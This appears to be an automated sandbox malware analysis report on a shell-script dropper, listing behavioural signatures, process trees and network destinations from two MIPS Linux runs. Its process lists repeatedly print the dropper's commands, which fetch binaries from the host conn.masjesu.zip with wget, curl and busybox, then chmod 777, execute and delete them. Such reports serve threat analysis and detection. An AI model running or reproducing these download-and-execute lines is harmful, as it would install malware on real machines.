Malware Analysis Report

2025-04-03 19:35

Sample ID 241028-csry6aydll
Target 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh
SHA256 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1
Tags
defense_evasion discovery antivm
score
7/10

Analysis Overview

score
7/10

SHA256

32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1

Threat Level: Shows suspicious behavior

The file 32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion discovery antivm

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

System Network Configuration Discovery

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-28 02:20

Signatures

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

150s

Max time network

155s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/chmod

[chmod 777 PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly

[./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/rm

[rm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/chmod

[chmod 777 tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98

[./tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

/bin/rm

[rm tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.126.196:80 conn.masjesu.zip tcp
DE 87.120.84.230:80 conn.masjesu.zip tcp

Files

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-28 02:20

Reported

2024-10-28 02:23

Platform

debian9-mipsel-20240611-en

Max time kernel

90s

Max time network

119s

Command Line

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 N/A
N/A /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd N/A
N/A /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX N/A
N/A /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 N/A
N/A /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme N/A
N/A /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc N/A
N/A /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB N/A
N/A /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N N/A
N/A /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS N/A
N/A /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G N/A
N/A /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ N/A
N/A /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 N/A
N/A /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly N/A
N/A /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd /usr/bin/curl N/A
File opened for modification /tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB /usr/bin/curl N/A
File opened for modification /tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75 /usr/bin/curl N/A
File opened for modification /tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly /usr/bin/curl N/A
File opened for modification /tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS /usr/bin/curl N/A
File opened for modification /tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5 /usr/bin/curl N/A
File opened for modification /tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N /usr/bin/curl N/A
File opened for modification /tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G /usr/bin/curl N/A
File opened for modification /tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc /usr/bin/curl N/A
File opened for modification /tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ /usr/bin/curl N/A
File opened for modification /tmp/tU5e3Mv37VUeG95FvGDrBgsbQUnkV9Sm98 /usr/bin/curl N/A
File opened for modification /tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9 /usr/bin/curl N/A
File opened for modification /tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX /usr/bin/curl N/A
File opened for modification /tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme /usr/bin/curl N/A

Processes

/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh

[/tmp/32903da67efb928137a136a1c4ef8d546f4d74e3c03820b6989987c1846190e1.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/chmod

[chmod 777 qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/tmp/qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9

[./qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/bin/rm

[rm qCXc0xGeyWJSKbsx2jYBPhMBInhHtGjpQ9]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/chmod

[chmod 777 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/tmp/7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd

[./7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/bin/rm

[rm 7QPUIgJ5ltsVoojrpK34GdrD0dsgtmAvkd]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/chmod

[chmod 777 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/tmp/133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX

[./133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/bin/rm

[rm 133lcy7pgamNJ6wgAd9Z0NryEjUMcKTKqX]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/chmod

[chmod 777 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/tmp/51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5

[./51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/bin/rm

[rm 51dXcnvJHWjaUe2kuPjUkfCauRrbMjuAW5]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/chmod

[chmod 777 Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/tmp/Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme

[./Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/bin/rm

[rm Zl0SaFKIfoluyEvIdLmSRKIXc2UJG2ePme]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/chmod

[chmod 777 gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/tmp/gRXScggvICs157KIrJp9HsjjV4vEZKOAKc

[./gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/bin/rm

[rm gRXScggvICs157KIrJp9HsjjV4vEZKOAKc]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/chmod

[chmod 777 rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/tmp/rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB

[./rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/bin/rm

[rm rJUunYHQQh3veQstczQ4iBZ3NnKmlMikoB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/chmod

[chmod 777 hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/tmp/hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N

[./hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/bin/rm

[rm hJQqqM876sLvlWjDRPK2XPYJg1jx4MnQ0N]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/chmod

[chmod 777 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/tmp/05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS

[./05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/bin/rm

[rm 05wZaxcTa605jhQnQNan9ekTwiVCkYY7pS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/chmod

[chmod 777 y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/tmp/y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G

[./y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/bin/rm

[rm y1efnhqJfPBB9JFqlcbE4RTK4HvogBTJ7G]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/chmod

[chmod 777 xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/tmp/xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ

[./xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/bin/rm

[rm xKuu4u7HcsskZEVp2tRyGDPs6APgWNz4RJ]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/chmod

[chmod 777 MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/tmp/MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75

[./MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/bin/rm

[rm MXwNqP9JQwDdVr4rvrMXgakYfN2hmuvv75]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly]

/bin/busybox

